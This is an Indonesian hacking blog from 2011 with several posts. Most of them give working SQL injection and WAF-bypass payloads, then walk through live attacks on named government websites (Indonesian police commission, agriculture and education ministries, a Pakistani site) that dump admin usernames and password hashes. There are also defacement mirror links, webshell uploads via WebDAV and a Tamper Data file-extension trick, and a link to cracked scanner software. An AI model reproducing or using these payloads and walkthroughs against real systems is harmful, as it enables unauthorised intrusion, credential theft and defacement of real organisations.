13 Oktober 2011

WAF Bypass (SQLi)


WAF adalah sebuah Firewall Aplikasi Web yang digunakan untuk memfilter request berbahaya (malicious requests) atau keyword pada websitew kita. Apakah WAF sebuah cara yang aman untuk melindungi Website saya? Tergantung dari program aplikasi anda, walaupun website kita sudah di lindungi sama WAF, akan tetapi tidak ada yang 100% aman.

Banyak cara yang dilakukan oleh injector untuk membypass security dari WAF ini.
Yakni dengan perintah - perintah yang akan melewati hadangan dari WAF.

Contoh - contoh perintah tersebut yakni :

Code : //, — , /**/, #, –+, — -, ;

1. Inline Comments

code : id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -
 

2. Buffer Overflow:/Unexpected input:
 

code : id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,27,28,29,30,31,32,33,34,35,36–+


3. Replaced keywords(preg_replace and/or WAF’s with the same action):


code : id=1+UNIunionON+SeLselectECT+1,2,3–

4. Charachter encoding:


code : id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users–+


-------------------------------------------------


Oke. berikut ini contoh - contoh serangan untuk membypass WAF tersebut ..

1. perintah order kolom :

index.php?id=1 order by 10-- Error
index.php?id=1 order by 9-- Error
index.php?id=1 order by 8-- Error
index.php?id=1 order by 7-- Error
index.php?id=1 order by 6-- Error
index.php?id=1 order by 5-- True


or :
index.php?id=1/**/order/**/by/**/10/*
index.php?id=1/**/order/**/by/**/9/*
index.php?id=1/**/order/**/by/**/8/*
index.php?id=1/**/order/**/by/**/7/*
index.php?id=1/**/order/**/by/**/6/*
index.php?id=1/**/order/**/by/**/5/*


2. perintah valid string 

index.php?id=-1 union select 1,2,3,4,5--
index.php?id=-1/**/union/**/select/**/1,2,3,4,5--
index.php?id=-1+un/**/ion+sel/**/ect+1,2,3—
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,3,4,5--


or :
 

index.php?id=-1/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3—

3. User, versi, data direktori, dsb :


index.php?id=-1 union select 1,2,database(),4,5--
index.php?id=-1 union select 1,2,user(),4,5--
index.php?id=-1 union select 1,2,version(),4,5--
index.php?id=-1 union select 1,2,@@datadir,4,5--


Cara menggabungkan :

index.php?id=-1 union select 1,2,group_concat(database(),0x3a,user(),0x3a,version()),4,5--


4. Lihat semua table :

index.php?id=-1 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where tables_schema=database()--

index.php?id=-1/**/union/**/select/**/1,2,group_concat(table_name),4,5/**/from/**/information_schema.tables/**/where/**/tables_schema=database()--

index.php?id=-1+UNION+SELECT+1,2,GROUP_CONCAT(TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
 

5. Lihat semua database :

index.php?id=-1+UNION+SELECT+1,2,GROUP_CONCAT(SCHEMA_NAME),4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
or:

index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCHEMA_NAME),4,5+FROM+INFORMATION_SCHEMA.SCHEMATA-
-


6. Sekarang kita akan liat kolom dari table yang kita inginkan :

index.php?id=-1 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646d696e

index.php?id=-1/**/ union/**/select/**/1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646d696e

index.php?id=-1+/*!UNION*/+/*!SELECT*+1,2,GROUP_CONCAT(COLUMN_NAME),4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e

index.php?id=-1+/*!UNION*
/+/*!SELECT*+1,2,GrOUp_COnCaT(COLUMN_NAME),4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e
 

7. Langkah terakhir:

index.php?id=-1 union select 1,2,group_concat(user,0x3a,password),4,5 from admin--

index.php?id=-1/**/union/**/select/**/1,2,group_concat(user,0x3a,password),4,5 from admin--

index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(user,0x3a,password,0x3a,email),3,4,5+FROM+admin—

index.php?id=-1+un/**/ion+sel/**/ect+1,2,GrOUp_COnCaT(user,0x3a,password,0x3a,email),3,4,5+FROM+admin—



Untuk Prof Of Concept silahkan kawan - kawan semua kembangan ketika melakukan injeksi. 
Akan tetapi untuk prof of concepnya saya juga akan buat tutorialnya nanti 

Salam ..



09 Oktober 2011

Acunetix Webdav on pu.go.id


Apa sih tuh WebDAV Vulnerability ? Coba cari di google aja.. haha
Tapi secara harfiah WebDAV adalah very vulnerable component of IIS servers  
Mari kita coba scan website pu.go.id dengan acunetix , and i got a WebDAV Vulnerability in pu.go.id Or u can use DAVtest .



Cari direktori yang di ijinkan untuk writeabilty ( bisa untuk kita sisipin file, dsb ) Example = www.localhost.com, www.localhost.com/images, dsb

Open windows explore, my pc use os windows 7 :p


Klik kanan Computer and add a network location

Just Next .. Next.. saja bro.
Ingat.. jika domain utama gak bisa, cari direktori yang mengijinkan kita untuk menyisipkan file sesuai dengan hasil scan dengan Acunetix.


Setelah itu next .. next .. saja.

Siapkan shell.asp, trus copy-paste shell kita to folder website victim :D 
Jangan lupa rename shell kita menjadi : shell.asp.;jpg or shell.asp.;txt
Tapi kita bisa menyisipkan file : .txt , html, htm dsb
----------------------------------------------- 

Mirror site in Zone-H



SQLi On Komisi Kepolisian



Tindakan saya bukan untuk merusak, tapi semata-mata hanya untuk media pembelajaran. Why ? 
Tujuannya agar kemanan website negara kita lebih di tingkatkan lagi . 
Sekali lagi saya minta maaf kalau ada kesalahan disini. Lets we start dude :

#[0x3a]. Chek the vull sql injection

http://www.komisikepolisianindonesia.com/secondPg.php?cat=video&view=34'

secondPg.php?cat=video&view=34 order 1-- false
secondPg.php?cat=video&view=34 order 2-- false
secondPg.php?cat=video&view=34 order 3-- false
secondPg.php?cat=video&view=34 order 4-- false
secondPg.php?cat=video&view=34 order 5-- false
secondPg.php?cat=video&view=34 order 6-- false
secondPg.php?cat=video&view=34 order 7-- false
secondPg.php?cat=video&view=34 order 8-- false
secondPg.php?cat=video&view=34 order 9-- false
secondPg.php?cat=video&view=34 order 10-- true

---> We've got the point to inject !

#[0x3b]. Chek the version database:

secondPg.php?cat=video&view=-134+union+all+select+1,2,3,4,5,6,7,8,9--

we've got a lucky number "2"

secondPg.php?cat=video&view=-134+union+all+select+1,version(),3,4,5,6,7,8,9--

- If version 5.0 = you lucky :D
- If version 4.0 = you dead :( [that's blind] hahaha ...

#[0x3c]. Tabel & column

secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables +where+table_schema=database()--

secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns +where+table_schema=database()--

Just switch

(table_name) --> (column_name)
from+information_schema.tables ---> from+information_schema.columns

Finally :

http://www.komisikepolisianindonesia.com/secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(admin_id,0x3a,admin_password),3,4,5,6,7,8,9+from+inweb_admin--
---------------------------------------------------------------

Mirror Deface :

http://indonesiandefacer.org/mirror/2011/10/komisikepolisianindonesia.html




01 Oktober 2011

Add Ons For Hacking


Pasti semua udah tau ama add ons, yups aplikasi .xpi untuk menemani browser kita. atau kata lain aplikasi untuk browser, bukan untuk desktop . nah berikut ini adalah add ons yang banyak di gunakan untuk membantu dalam proses hacking.
Adblock Plus allows you to regain control of the internet and view the web the way you want to.

Allows you to customize the way a web page displays or behaves, by using small bits of JavaScript.

It allows JavaScript, Java and other executable content to run only from trusted domains of your choice, e.g. your home-banking web site, guarding your "trust boundaries" against cross-site scripting attacks (XSS), cross-zone DNS rebinding / CSRF attacks (router hacking), and Clickjacking attempts,

You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.

Use tamperdata to view and modify HTTP/HTTPS headers and post parameters.

Sama seperti Tamper data

This toolbar will help you in testing sql injections, XSS holes and site security.

Server Spy indicates what brand of HTTP server (e.g. Apache, IIS, etc.) runs on the visited sites. When a tab is selected, the corresponding server name is shown on the right-hand side of the browser's status bar.

SQL Inject Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.

10. XSS Me
XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS).

11. ShowIP
Show the IP address(es) of the current page in the status bar. It also allows querying custom information services by IP (right click) and hostname (left click), like whois, netcraft, etc.

This plugin lets you search on Offensive Security Exploit database.It has been tested using Mozilla Firefox 3.5.5 (on Linux and Windows)

This plugin lets you search on Packet Storm - www.packetstormsecurity.org - database. Packet Storm offers an abundant resource of up-to-date and historical security tools, exploits, and advisories.



30 September 2011

Backtrack 5 in Ubuntu 10


Hello .. :D

Mungkin banyak dari kita yang sudah tau soal distro Backtrack , jadi gak perlu saya terangkan lagi. nah untuk saat ini saya akan sedikit ngasih tips untuk menambahkan Repository Backtrack 5 di Ubuntu 10. kebetulan saya make ubuntu 10.

Berikut cara menambahkan Repository BT 5 in Ubuntu 10 :

1. Downloads key backtrack di sini :
 
code :

wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

2. Edit source list repository ubuntu


code :


sudo gedit /etc/apt/sources.list

code :


deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing


atau bisa dari "Synaptic Package Manager"




And then run :

# sudo apt-get update

Anda cukup ke System -->> Administrator -->> Synaptic Package Manager Trus Install atau lewat ubuntu software.



Selesai deh, cukup gitu doang kok gak repot,
dan saya udah buktiin :D



SQLi on Deptan.go.id


Sebenarnya ini udah merupakan bug lama yang sampe sekarang belum di patch ! Cuma untung servernya "safe mode : off" , but remember.. nothing secure :D Tapi banyak cara menuju roma, watch yours system !

Vull : http://www.deptan.go.id/tampil.php?page=kelembagaan&id=31
1=1 true ..
1=0 false ..

Code :

tampil.php?page=kelembagaan&id=31 order by 10-- false
tampil.php?page=kelembagaan&id=31 order by 9 -- true

Code:

tampil.php?page=kelembagaan&id=31 and 1=1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
tampil.php?page=kelembagaan&id=-31and 1=1 union all select1,2,3,4,5,6,7,8,9-- Hasilnya = 4

versinya :
tampil.php?page=kelembagaan&id=-31 and 1=1 union all select1,2,3,version(),5,6,7,8,9-- 

hasilnya : 5.0.45-standard-log

usernya :
tampil.php?page=kelembagaan&id=-31 and 1=1 union all select1,2,3,@@datadir,5,6,7,8,9-- hasilnya = /opt/coolstack/mysql_32bit/data/ /

Some Info :
- version() = versinya
- database() = databsenya
- user() = usernya
- @@datadir = data direktorinya

Code:

tampil.php?page=kelembagaan&id=-31 and 1=1 union all select 1,2,3,CHAR(97, 108, 100, 106, 97, 122, 97, 114, 97),5,6,7,8,9--

tablenya :

# tampil.php?page=kelembagaan&id=-31 and 1=1 union all select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()—


--------------------------------------------------------------


You can continue yourself, because some reason :)



Sqlmap Tool For Beginners


Sql Injection merupakan tekhnik dari sekian tekhnik yang sering di lakukan oleh hacker dalam melakukan penetrasi. Hal ini dikarenakan bug sql injection sering kita jumpai pada banyak website di internet.

Nah, kali ini saya coba sharing cara hacking dengan tekhnik sql injection. Akan tetapi dengan bantuan tool SqlMap. Terimakasih tentunya untuk pengembangnya yakni Bernardo Damele AG & Miroslav Stampar yang telah mempermudah kita untuk melakukan penetrasi.

Aplikasi mendukung beberapa database : MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Enam tekhnik sql-injection : boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band. Dan fitur - fitur lain sebagainya..

Nah bagi anda pengguna windows xp, vista, 7 dan 8,  anda pun dapat menggunakannya.
Yakni dengan install  python di komputer anda. Silahkan download kedua paket ini :

Phyton :   http://www.python.org/download/
Sqlmap :     http://sqlmap.sourceforge.net/

Cukup download Sqlmap dan letakkan di direktori PC kita. Disini saya misalkan sqlmap di direktori C:


1. Sqlmap Live Target

Tentunya saya akan coba penetrasi pada website target, moga-moga paham :)

Web target : http://www.psf.gov.pk/staffdetail.php?id=10

code :     
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --dbs

available databases [2]:
[*] information_schema
[*] psfdb

code :      
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --tables psfd

 +-----------------------------------+
| user                                    |
| users_site                           |
| wp_commentmeta               |
| wp_comments                     |
| wp_links                             |
| wp_options                         |
| wp_options2                       |
| wp_postmeta                      |
| wp_posts                            |
| wp_term_relationships        |
| wp_term_taxonomy             |
| wp_terms                            |
| wp_usermeta                       |
| wp_users                             |
+-----------------------------------+

 
code :
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --columns -D psfdb -T wp_users 

 

+---------------------------+-------------------------+
| Column                    | Type                       |
+---------------------------+-------------------------+
| display_name           | varchar(250)            |
| ID                            | bigint(20) unsigned  |
| user_activation_key | varchar(60)              |
| user_email               | varchar(100)            |
| user_login                | varchar(60)             |
| user_nicename         | varchar(50)             |
| user_pass                 | varchar(64)             |
| user_registered        | datetime                 |
| user_status               | int(11)                    |
| user_url                    | varchar(100)           |
+---------------------------+------------------------+


code :
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --dump -D psfdb -T wp_users

code:
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 -D psfdb -T wp_users -C user_login,user_pass,user_email --dump 

Than tou will see the dump database in C:\Hack\sql\sqlmap\output


2. Some Powerfull Command Sqlmap



sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users

sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users (HTTP Data)

sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users

sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" \
--auth-type Basic --auth-cred "testuser:testpass"


sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper \
tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns \
-D testdb -T users -C name (Enumerate database table columns)



Jika ingin lebih mengetauhi perintah - perintah di sqlmap.

Kita bisa mendapatkan pencerahan di sini

Goodluck !




28 September 2011

SQLi belajar.kemdiknas.go.id


Disini saya gak bermaksud untuk merusak ataupun show-off yah :) 
saya akan coba sharing yang namanya basic-SQLi karena kalau untuk pemula error based merupakan dasar kita untuk advance sql injection. 
itung-itung bisa lancar manualnya, oke kita langsung aja yah :)
1. Vull sql injection :
http://belajar.kemdiknas.go.id/index.php?display=home&forum=1&IDMP=0&IDkls=99999999

Code :

IDkls=99999999 order by 10-- false
IDkls=99999999 order by 9-- false
IDkls=99999999 order by 8-- false
IDkls=99999999 order by 7-- false
IDkls=99999999 order by 6-- true

Oke .. berarti true kita di " order by 6-- "
Berarti adalah valid kolomnya.

2. Sekarang cari valid string atau no togel :

code :

IDkls=99999999+union+all+select+1,2,3,4,5,6--

- Perhatikan angka yang keluar ( paling atas/top page) yups.. "4"
- Angka 4 ini merupakan valid stringnya.

3. Menampilkan versinya :

code :

IDkls=-99999999+union+all+select+1,2,3,version(),5,6--

- versi : 5.1.41-3ubuntu12.99
- ganti angka 4 dengan : version(), database(), @@version dsb .


4. Menampilkan Table DB :

code:

IDkls=-99999999+union+all+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables+where+table_schema=database()--

- group_concat = perintah untuk menampilkan
- (table_name) = nama - nama table

5. Menampilkan Columnnya :

IDkls=-99999999+union+all+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_schema=database()--

Cukup ganti :
(table_name) dengan (column_name)
information_schema.tables" dengan information_schema.columns

6. Oke.. Kita cari table dari users :

code:

IDkls=-99999999+union+all+select+1,2,3,group_concat(username,0x3a,password),5,6 from users--




20 Juli 2011

KTP Elektronik (e-KTP)


Anda semua sudah pasti mendengar istilah KTP Elektronik (e-KTP), istilah lain dari Kartu Tanda Penduduk online. Biar bisa mobile gitu :D. Memang sekarang pemerintah lagi gencar-gencarnya mensosialisasikan e - KTP pada masyarakat.

Memang e-KTP memberikan kesan bahwa kita adalah masyarakat yang udah canggih dan modern. dan ke untungan dari e-KTP ini banyak seperti bisa lebih mobile, mencegah duplikasi ganda. Sehingga orang-orang seperti Gayus, dan Nazaruddin tidak bisa memiliki identitas ganda :D.

KTP elektronik masa berlaku 5 tahun, dan kabarnya isinya yaitu : Penyimpanan dua buah sidik jari telunjuk di dalam chip sesuai dengan standar internasional NISTIR 7123 dan Machine Readable Travel Documents ICAO 9303 serta EU Passport Specification 2006. Bentuk KTP elektronik sesuai dengan ISO 7810 dengan form factor ukuran kartu kredit yaitu 53,98 mm x 85,60 mm.
Wedeh kedengarannya canggih juga yah :D

Namun yang jadi pertanyaan saya, apakah pemerintah akan mampu untuk menyediakan alat pembaca kartu di setiap kantor-kantor seperti : PLN, Bank, Rumah Sakit, atau bahkan Pos Security ? Dan bagaimana dengan metode enkripsinya?

Nah kalau kita melihat peralatan canggih dari China dan Taiwan, saya rasa amat sangat naif untuk mengklaim bahwa isi chip pada e-KTP tidak bisa di manipulasi atau di ubah. Dengan alat kedua negara ini, maling tidak selangkah lebih maju dari Kepolisian, Tapi beberapa langkah. hahahahaha ...

Saya memang skeptis yah dengan implementasi Tekhnologi Informasi negara kita, Karena implementasinya didasarkan dari petinggi pemerintahan yang tidak mengerti soal TI, atau kata lain yang mutusin, gagasin, malah yang gak ngerti TI !! 

Maklum ini project Triliunan ... 
U know What I'm Talking About ..

Sumber : PC-MEDIA




22 Maret 2011

Find Admin Page Login


Mungkin Sebagian dari kita sudah banyak yang tau apa itu admin page login , admin page login itu merupakan direktori / page pada website untuk admin login. Ketika kita sudah mendapatkan username dan password akun dari admin website victim kita segera bergegas untuk login dengan cara mencari page admin login.
Direktori umum untuk admin login seperti : /admin/ login.php/ system/ admin.html/ security/ dan lain sebagainya. Nah yang jadi permasalahan kalau kita tidak bisa menemukan admin page login pada website yang telah kita kuasai akun adminnya, kadang banyak yang menggunakan jasa tools admin finder , entah itu admin finder online, admin finder.pl atau pake admin finder havij tool. Tapi kalau gak ketemu juga gimana dong? =P

Oke saya akan sharing ..
Berikut ini aplikasi yang bisa membantu kita :

1. Acunetix Web Vulnerability Scanner

Lah kok pake Acunetix, iyah saya kadang make untuk melihat struktur dari website tersebut (Crawler) besar kemungkinan dengan fitur crawler kita bisa mendapatkan direktori sensitif dari website target, seperti cgi, admin, dsb. Sedangkan pada tool-tools admin finders kita mencari dengan cara hanya menggunakan list umum seperti : admin, login, system dsb. jadi kita hanya terpatok di list itu aja . =D gak percaya? liat gambar di bawah ini :



Website  Acunetix

Download Acunetix With Crack



2. OWASP DirBuster Bruteforce

DirBuster adalah aplikasi java multi threaded dirancang untuk brute direktori dan nama file pada web / aplikasi server. Seringkali apa yang tampak seperti web server dalam keadaan default instalasi sebenarnya tidak, DirBuster berusaha untuk melihat halaman dan aplikasi tersembunyi di dalam suatu webserver

Nah kalau tool yang satu ini memang di buat untuk hanya menemukan direktori atau halaman -halaman yang ada pada suatu webserver. Kelebihannya aplikasi ini juga di tunjang dengan list yang cukup kaya =D. Kalau menurut saya palikasi ini memang spesialis untuk hal yang beginian.



 Go to website

Oke sekian dulu tips dari saya,
tapi kalau gak berhasil, hubungi adminnya aja langsung (mode: ngakak) .



17 Maret 2011

Acunetix Web Scanner


Yahh, itulah pertanyaan yang harus dipertimbangkan baik-baik (admin web). Nah tidak ada salahnya jika anda menggunakan jasa tools yang satu ini untuk mengaudit keamanan website anda. Namun, tools yang satu ini juga banyak di manfaatkan oleh para hacker untuk mengetauhi celah kemanan pada website target. Hahaha.. itulah realita.


Penggunaan aplikasi yang satu ini cukup mudah dan kaya akan fitur database of hacking menurut saya. karena hampir semua database kemanan lengkap dalam tools yang satu ini . Meliputi antara lain : Sql Injection , Xss, Site Crawler, Http editor, dan lain-lain . Anda cukup masukan alamat url website target dan scan :D

Berikut ini penjelasan dasar fitur-fitur Acunetix :



 
1. Web Scanner

Fitur yang satu ini kita gunakan untuk membedah isi perut dari website yang kita scan . dalam arti kata dengan melakukan scan kita bisa melihat struktur dan info dari website yang kita scan. Nah kadang banyak yang menggunakan untuk mencari direktori / file sensitif , seperti admin login, cgi, system, open port dsb .

biasanya terdiri dari duafase:

Crawling -

Pada tahap ini, crawler secara otomatis menganalisis website dan kemudian melihat struktur website target.

Scanning -

Pada tahap ini, Acunetix WvS melakukan Web scan Vullnerability terhadap website yang kita scan. Sehingga kita bisa memperoleh data-data yang sensitif dan penting :D

2. Blind Sql Injector

Blind SQL Injector adalah sebuah tools otomatis, dan bisa untuk membantu untuk mengetes secara manual SQL Injection yang kita lakukan. Tools ini juga mampu menghitung database, tabel, data dump dan juga membaca file tertentu pada sistem file dari web server jika SQL injection dieksploitasi ditemukan

3. HTTP Editor

Berguna untuk membuat request HTTP dan debug custom, HTTP requests and responses. dan juga mencakup encoding dan decoding. seperti encode / decode teks dan URL untuk hash MD5, UTF-7 format dan banyak format lainnya

4. HTTP Fuzzer

Dengan Fuzzer HTTP Anda dapat melakukan tes fuzzing, untuk menguji aplikasi data pada web yang invalid atau tidak kita ketauhi. Dengan tool ini Anda dapat dengan mudah menginput rule untuk kita uji.

Contoh : http://website.com/listproducts.php?cat=1 Kita dapat mengganti bagian terakhir dari URL '1 'dengan angka antara 1 sampai 999. Hanya hasil yang valid akan dilaporkan. Tingkat otomatisasi ini memungkinkan Anda untuk dengan cepat menguji hasil dari 1000 query tanpa harus melakukan satu persatu .



16 Maret 2011

Upload shell php (Tamper Data)

Mungkin banyak dari kita yang sudah tau apa itu webshell ? WebShell (PHP Shell), itu sebuah aplikasi berbasis php, yg dipake user untuk berinteraksi dengan server sistem. Kalo web shell, shell yg ditulis dalam bahasa pemrograman web (seperti R57, C99, dsb) untuk memudahkan eksplorasi terhadap suatu web yg memliki bug.

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau fasilitasnya hanya untuk upload file.jpg gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit

1. Siapakan dulu file shell.php seperti : C99Shell, r57, atau b374k
2. Rename dengan nama : shell.php.jpg
3. Install add ons Tamper Data dulu di browser mozilla kita :D
4. Restart dan kita mulai upload
5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan



6. Trus Uploads shell.php.jpg kita dan tamper :D



7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah :D



Sekarang anda tinggal cari dimana file shell anda berada .
Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung .

Kalau masih bngung , neh liat aja video'nya :
 



05 Februari 2011

Jenis - Jenis Tekhnik Hacking


Mungkin kita semua sudah tau tentang hacking, hacking merupakan aktivitas penyusupan ke dalam sebuah sistem komputer ataupun jaringan / website dengan tujuan untuk menyalah gunakan ataupun merusak sistem yang ada. Namun dengan begitu, tidak semua hacking bertujuan untuk merusak loh .

Nah tekhnik-tekhnik yang banyak di ketauhi adalah sbb :

1. Parameter manipulation :

Arbitary File Deletion
Code Execution
Cookie Manipulation ( meta http-equiv & crlf injection )
CRLF Injection ( HTTP response splitting )
Cross Frame Scripting ( XFS )
Cross-Site Scripting ( XSS )
Directory traversal
Email Injection
File inclusion
Full path disclosure
LDAP Injection
PHP code injection
PHP curl_exec() url is controlled by user
PHP invalid data type error message
PHP preg_replace used on user input
PHP unserialize() used on user input
Remote XSL inclusion
Script source code disclosure
Server-Side Includes (SSI) Injection
SQL injection
URL redirection
XPath Injection vulnerability
EXIF

2. MultiRequest parameter manipulation :

Blind SQL injection (timing)
Blind SQL/XPath injection (many types)
 

3. File checks :
 

8.3 DOS filename source code disclosure
Search for Backup files
Cross Site Scripting in URI
PHP super-globals-overwrite
Script errors ( such as the Microsoft IIS Cookie Variable Information Disclosure )
 

4. Directory checks :
 

Cross Site Scripting in path
Cross Site Scripting in Referer
Directory permissions ( mostly for IIS )
HTTP Verb Tampering ( HTTP Verb POST & HTTP Verb WVS )
Possible sensitive files
Possible sensitive files
Session fixation ( jsessionid & PHPSESSID session fixation )
Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc )
WebDAV ( very vulnerable component of IIS servers )
 

5. Text Search Disclosure :
 

Application error message
Check for common files
Directory Listing
Email address found
Local path disclosure
Possible sensitive files
Microsoft Office possible sensitive information
Possible internal IP address disclosure
Possible server path disclosure ( Unix and Windows )
Possible username or password disclosure
Sensitive data not encrypted
Source code disclosure
Trojan shell ( r57,c99,crystal shell etc )
( IF ANY )Wordpress database credentials disclosure

6. File Uploads :
Unrestricted File Upload

7. Authentication :

Microsoft IIS WebDAV Authentication Bypass
SQL injection in the authentication header
Weak Password
GHDB - Google hacking database ( using dorks to find what google crawlers have found like passwords etc )
Web Services - Parameter manipulation & with multirequest
Application Error Message ( testing with empty, NULL, negative, big hex etc )
Code Execution
SQL Injection
XPath Injection
Blind SQL/XPath injection ( test for numeric,string,number inputs etc )
Stored Cross-Site Scripting ( XSS )
Cross-Site Request Forgery ( CSRF )


---------------------------------------------------------------------------
Sumber : google